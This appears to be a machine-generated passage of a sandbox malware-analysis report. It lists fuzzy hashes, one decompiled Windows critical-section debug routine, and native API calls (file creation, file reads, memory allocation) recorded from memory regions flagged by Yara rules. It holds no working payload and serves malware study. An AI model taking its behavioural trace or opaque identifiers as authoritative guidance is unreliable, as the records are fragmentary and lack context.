                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9810b9498a56728cbae5c90b10a651d2ead56d627ac44cf514787832cd57095
                                                                                  • Instruction ID: e7bf2dfcd025d40df863c93323e6431ce5a34077c12b04fe1d534f41a369a644
                                                                                  • Opcode Fuzzy Hash: c9810b9498a56728cbae5c90b10a651d2ead56d627ac44cf514787832cd57095
                                                                                  • Instruction Fuzzy Hash: 4090027530904842D60065595C05A97440A97D0345F52E461A141559CD86948861F161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a63c348a586308b50ae1d21ac0d53739005a5a0733a80fd47378948dd85247ce
                                                                                  • Instruction ID: 801908b8fc162d5e6f5d8a1bd44a1d28ee44865676d0911f4edcec72dae07943
                                                                                  • Opcode Fuzzy Hash: a63c348a586308b50ae1d21ac0d53739005a5a0733a80fd47378948dd85247ce
                                                                                  • Instruction Fuzzy Hash: 3390026170900802D24071595819716441A97D0341F52E061A1015554DC6998A55B6E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebcedf33cfe606d3f1549830be3fbd89be173951bfab8baa6ff2b6bb54928e99
                                                                                  • Instruction ID: a9e4940cad61f7959708b1c3f098e857f5f82e5d8f2b0548b60f83a67a585390
                                                                                  • Opcode Fuzzy Hash: ebcedf33cfe606d3f1549830be3fbd89be173951bfab8baa6ff2b6bb54928e99
                                                                                  • Instruction Fuzzy Hash: DC90026134500C02D24071598815717440BD7D0741F52D061A1015554D86568965B6F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8302c6ac5af13b6a12da4e09601ccb0540beb939b44406facd29ab4f1c333793
                                                                                  • Instruction ID: d8e8d31baeee1d537d7b4204bca279f510131fa52cf08176ed9f8e53c842bf12
                                                                                  • Opcode Fuzzy Hash: 8302c6ac5af13b6a12da4e09601ccb0540beb939b44406facd29ab4f1c333793
                                                                                  • Instruction Fuzzy Hash: EA900271305004529600A6995C05A5A850A97F0341B52E065A5005554C85948861B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: a6ad683348ce2ef9660277085b7ccd5fd0b8a3e2327d26ea8aa990910f812478
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 53%
                                                                                  			E00F3FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                  				void* _t7;
                                                                                  				intOrPtr _t9;
                                                                                  				intOrPtr _t10;
                                                                                  				intOrPtr* _t12;
                                                                                  				intOrPtr* _t13;
                                                                                  				intOrPtr _t14;
                                                                                  				intOrPtr* _t15;
                                                                                  
                                                                                  				_t13 = __edx;
                                                                                  				_push(_a4);
                                                                                  				_t14 =  *[fs:0x18];
                                                                                  				_t15 = _t12;
                                                                                  				_t7 = E00EECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                  				_push(_t13);
                                                                                  				E00F35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                  				_t9 =  *_t15;
                                                                                  				if(_t9 == 0xffffffff) {
                                                                                  					_t10 = 0;
                                                                                  				} else {
                                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                  				}
                                                                                  				_push(_t10);
                                                                                  				_push(_t15);
                                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                  				return E00F35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                  			}










                                                                                  0x00f3fdda
                                                                                  0x00f3fde2
                                                                                  0x00f3fde5
                                                                                  0x00f3fdec
                                                                                  0x00f3fdfa
                                                                                  0x00f3fdff
                                                                                  0x00f3fe0a
                                                                                  0x00f3fe0f
                                                                                  0x00f3fe17
                                                                                  0x00f3fe1e
                                                                                  0x00f3fe19
                                                                                  0x00f3fe19
                                                                                  0x00f3fe19
                                                                                  0x00f3fe20
                                                                                  0x00f3fe21
                                                                                  0x00f3fe22
                                                                                  0x00f3fe25
                                                                                  0x00f3fe40

                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3FDFA
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F3FE01
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F3FE2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                  • API String ID: 885266447-3903918235
                                                                                  • Opcode ID: 9dc3e8b0865734ff9475917b8f3f89a980cc43686f6631ea759f26d95ed940b6
                                                                                  • Instruction ID: c1c0e750c65e658e2d92dd3e107d4e602e1539cdd865b0cc2ac6531a6debf30d
                                                                                  • Opcode Fuzzy Hash: 9dc3e8b0865734ff9475917b8f3f89a980cc43686f6631ea759f26d95ed940b6
                                                                                  • Instruction Fuzzy Hash: A0F0F672640601BFDA201A45DC02F33BB5AEB84B30F240314F628561E1EA62F860A6F0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,030E3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030E3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030E820D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: .z`
                                                                                  • API String ID: 823142352-1441809116
                                                                                  • Opcode ID: 02f0f0096c8857b2c8892c27d9d29dd639d514dd43c5746a9fa5ff6305b6ad20
                                                                                  • Instruction ID: 80a59374a1691d890cd00e2442973494198ea60a33ffdd4ab853e40f94c5a66d
                                                                                  • Opcode Fuzzy Hash: 02f0f0096c8857b2c8892c27d9d29dd639d514dd43c5746a9fa5ff6305b6ad20
                                                                                  • Instruction Fuzzy Hash: 3201AFB2245108AFDB08CF98DC94EEB77A9AF9C654F158248BA0D97241D630E815CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,030E3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030E3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030E820D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: .z`
                                                                                  • API String ID: 823142352-1441809116
                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                  • Instruction ID: acd94620ae8eb2acedf240f64f40579255ec966465210fef2de737355c4d83ac
                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                  • Instruction Fuzzy Hash: B0F0B2B2205208AFCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(030E3D52,5E972F59,FFFFFFFF,030E3A11,?,?,030E3D52,?,030E3A11,FFFFFFFF,5E972F59,030E3D52,?,00000000), ref: 030E82B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 660a87f5e44aaa8edf3a90c879f3f55b9ad7ed9ff3f6bd72651b2cdfb9945f9f
                                                                                  • Instruction ID: b24aeb6df6e4de8b748bf4e871fdf5564a7c09c9bd2015aab85cddb24fd6d5d8
                                                                                  • Opcode Fuzzy Hash: 660a87f5e44aaa8edf3a90c879f3f55b9ad7ed9ff3f6bd72651b2cdfb9945f9f
                                                                                  • Instruction Fuzzy Hash: 9DF0E7B6200208AFCB04DF88CC81DEB77A9EF8C714F018658BE1D97240DA30E812CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(030E3D52,5E972F59,FFFFFFFF,030E3A11,?,?,030E3D52,?,030E3A11,FFFFFFFF,5E972F59,030E3D52,?,00000000), ref: 030E82B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                  • Instruction ID: 700938a2b5fab331b32e39709181fd3c89864da5fd606d49f003fd3a2cb43356
                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                  • Instruction Fuzzy Hash: 62F0A4B6200208AFCB14DF89DC80EEB77ADAF8C754F158648BA1D97241DA30E811CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030D2D11,00002000,00003000,00000004), ref: 030E83D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: c4489b1120e8fca708eb0dd69236c3e7962f440d4cfb4d83d9275a85c487bcc0
                                                                                  • Instruction ID: 224b5c22fd0114ede8b7855a42d2fd8c6ba1a084741a231cebfbed13a6657d2a
                                                                                  • Opcode Fuzzy Hash: c4489b1120e8fca708eb0dd69236c3e7962f440d4cfb4d83d9275a85c487bcc0
                                                                                  • Instruction Fuzzy Hash: 03F0FE75204209AFDB14DF99CC80EA777ADAF88650F158648FA5897281C630E811CBE4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030D2D11,00002000,00003000,00000004), ref: 030E83D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                  • Instruction ID: f59e50ef2b6545423a2067dcb50e03318659385e699686bfa007ffbdf3531a81
                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                  • Instruction Fuzzy Hash: CAF015B6200208AFCB14DF89CC80EEB77ADAF88650F118548FE0897241C630F810CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(030E3D30,?,?,030E3D30,00000000,FFFFFFFF), ref: 030E8315
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 4c0f54320744814167908c574265a929d74afca5e4580a37a7b8133f0940c156
                                                                                  • Instruction ID: fe5582006fac8cacde0db4c05b88bd2cebbe9644df5022ffd7f2bb21940cb921
                                                                                  • Opcode Fuzzy Hash: 4c0f54320744814167908c574265a929d74afca5e4580a37a7b8133f0940c156
                                                                                  • Instruction Fuzzy Hash: 88E08C7A240204ABD710EBE48C44EE77B68EF88620F098494BA485B242C530E90087D0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(030E3D30,?,?,030E3D30,00000000,FFFFFFFF), ref: 030E8315
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                  • Instruction ID: fcbcee6fa6262ae0dd7f87051c64070ff9a31304e33736b1b752949429e94c94
                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                  • Instruction Fuzzy Hash: 9BD012762003146BD710EFD8CC45ED7775CEF44650F154455BA185B241C530F90086E0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e8d3c79cf87e6d83512060a2b06bce6d96510eac870026299fbcd3ac7e5f5c4a
                                                                                  • Instruction ID: 1aa03db438e7e27eef249cdbd1f423d1ba3a28dbd00ec81685adbe89967d3708
                                                                                  • Opcode Fuzzy Hash: e8d3c79cf87e6d83512060a2b06bce6d96510eac870026299fbcd3ac7e5f5c4a
                                                                                  • Instruction Fuzzy Hash: 48900266211041030205A659578450F055697D6391391C075F1005590CD66188616161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 38e0ac2d4b1752d63ea31a4d03ef148330554553eb3fe276e3e963aeb0ebf08a
                                                                                  • Instruction ID: c39c1cb31f355f07ca9412d0ce6e4af0b8c5709852c4b87f6dd220259f851d1d
                                                                                  • Opcode Fuzzy Hash: 38e0ac2d4b1752d63ea31a4d03ef148330554553eb3fe276e3e963aeb0ebf08a
                                                                                  • Instruction Fuzzy Hash: 049002A22020410342057259949461E451A97E1241B91C075E10045D0DC56588917165
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: bf40bd71b540a9bb251f315bec2dfc8d7842d05a0989a73952689856f2655cb4
                                                                                  • Instruction ID: cef566ec27b9d772b3da515b1afdc9e994aebf65a1c362ef7cefc7d6bc2ec47b
                                                                                  • Opcode Fuzzy Hash: bf40bd71b540a9bb251f315bec2dfc8d7842d05a0989a73952689856f2655cb4
                                                                                  • Instruction Fuzzy Hash: 0290027220104502D2006699A48864E051597E1341F91D065A5014595EC6A588917171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e88f5d9741197e57492e0ec0fd4e6dcf410414d917403064856b1908339328ef
                                                                                  • Instruction ID: 72c17dbfaa2f46db37e7d171eeeafb191a526a998a85e62a9756330e3276d339
                                                                                  • Opcode Fuzzy Hash: e88f5d9741197e57492e0ec0fd4e6dcf410414d917403064856b1908339328ef
                                                                                  • Instruction Fuzzy Hash: EE90026A21304102D2807259A48860E051597D2242FD1D469A0005598CC95588696361
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 098b82ec24498436733197b88bdada77fa91ae3da3b4bfba6a2eb842d22a9bf5
                                                                                  • Instruction ID: 07590cc0e94a1d0a4f79721e4c558e445f8db24315d4608079159f64aa12c58d
                                                                                  • Opcode Fuzzy Hash: 098b82ec24498436733197b88bdada77fa91ae3da3b4bfba6a2eb842d22a9bf5
                                                                                  • Instruction Fuzzy Hash: 8790027231118502D2106259D48470E051597D2241F91C465A0814598D86D588917162
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 903967ae45af1fb49266d96a4100f36446d26bc9be5767ab65f36bf9049641b7
                                                                                  • Instruction ID: 0e34636c5fa671e71cb8ead47c05f8c8537b504e9aab98353906515126e2fcf0
                                                                                  • Opcode Fuzzy Hash: 903967ae45af1fb49266d96a4100f36446d26bc9be5767ab65f36bf9049641b7
                                                                                  • Instruction Fuzzy Hash: 1D90027220508942D24072599484A4E052597D1345F91C065A00546D4D96658D55B6A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9834454a1959a4e08705021963d1b893bb1d58092f629d9f532c67a384a16ff0
                                                                                  • Instruction ID: 80bc58a12c082fd5dace6d8f6712f615c09a92a4536e8ef463a91aa36d6fa9b8
                                                                                  • Opcode Fuzzy Hash: 9834454a1959a4e08705021963d1b893bb1d58092f629d9f532c67a384a16ff0
                                                                                  • Instruction Fuzzy Hash: D090027220104902D2807259948464E051597D2341FD1C069A0015694DCA558A5977E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 944a2bf77f96b87ca7046cfae3a4930dac54ab9900be76dd705822e850098ed2
                                                                                  • Instruction ID: 570c0303382134055f1b2d72ac4459cebd5d517a8a4578259cf7b09173db31ab
                                                                                  • Opcode Fuzzy Hash: 944a2bf77f96b87ca7046cfae3a4930dac54ab9900be76dd705822e850098ed2
                                                                                  • Instruction Fuzzy Hash: 2D90027220104942D20062599484B4E051597E1341F91C06AA0114694D8655C8517561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 70f36ca74cb3fcac2f92938e5200fc7df24752a8fbc1f9cef2f6ec8589094066
                                                                                  • Instruction ID: ff18014038189699fb3112059c5c3e131dde225e2f94630334277f89ad6448c9
                                                                                  • Opcode Fuzzy Hash: 70f36ca74cb3fcac2f92938e5200fc7df24752a8fbc1f9cef2f6ec8589094066
                                                                                  • Instruction Fuzzy Hash: 949002722010C902D2106259D48474E051597D1341F95C465A4414698D86D588917161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0a7a9696516d9b1ba85a6b9a16636f839bad4c11f6ca47b8575f20bf9d076593
                                                                                  • Instruction ID: 42f6419cd2c2b38466717689436606fb30c1d4f880910b35c79d340d3b01c931
                                                                                  • Opcode Fuzzy Hash: 0a7a9696516d9b1ba85a6b9a16636f839bad4c11f6ca47b8575f20bf9d076593
                                                                                  • Instruction Fuzzy Hash: 7F9002B220104502D2407259948474E051597D1341F91C065A5054594E86998DD576A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9bc292766c353a851d665d82d7e26759f43307cfa00b24b20ff059d74a2b57d6
                                                                                  • Instruction ID: fec1e12701420057e35c8b03c16a81d91f350ee8c7ae4857c2217e29a2ed4642
                                                                                  • Opcode Fuzzy Hash: 9bc292766c353a851d665d82d7e26759f43307cfa00b24b20ff059d74a2b57d6
                                                                                  • Instruction Fuzzy Hash: F09002A234104542D20062599494B0E0515D7E2341F91C069E1054594D8659CC527166
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4adf08fd259ccbcff0bb5a77ef2135d69dc6ad3f0e5079b72e1cfa8b28e8c2a1
                                                                                  • Instruction ID: 80b6b927fe9edcf815f1ef378afd1d8976d42b8fb4df0aa7b572b7d835568548
                                                                                  • Opcode Fuzzy Hash: 4adf08fd259ccbcff0bb5a77ef2135d69dc6ad3f0e5079b72e1cfa8b28e8c2a1
                                                                                  • Instruction Fuzzy Hash: 3F900262242082525645B259948450F4516A7E12817D1C066A1404990C85669856E661
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 94943cc94d4803fd2eacc69db9854cb8fd08e9271b0504389da130880b9ec345
                                                                                  • Instruction ID: cff25584189d72a8e820c3e4c29274ab4a2d64b9773a4bbb6ed3d3f0fca9f17b
                                                                                  • Opcode Fuzzy Hash: 94943cc94d4803fd2eacc69db9854cb8fd08e9271b0504389da130880b9ec345
                                                                                  • Instruction Fuzzy Hash: 6390027220104513D2116259958470F051997D1281FD1C466A0414598D96968952B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fb2cd2e907bad04ea43e1baff30228e5c5d905e430f68ab9b5475510f0956120
                                                                                  • Instruction ID: 89f0e57520acc6eb5f2afdcef4edebe64d0d3d93deca7c3661389ae70dccc606
                                                                                  • Opcode Fuzzy Hash: fb2cd2e907bad04ea43e1baff30228e5c5d905e430f68ab9b5475510f0956120
                                                                                  • Instruction Fuzzy Hash: 3090026221184142D30066699C94B0F051597D1343F91C169A0144594CC95588616561
                                                                                  Uniqueness

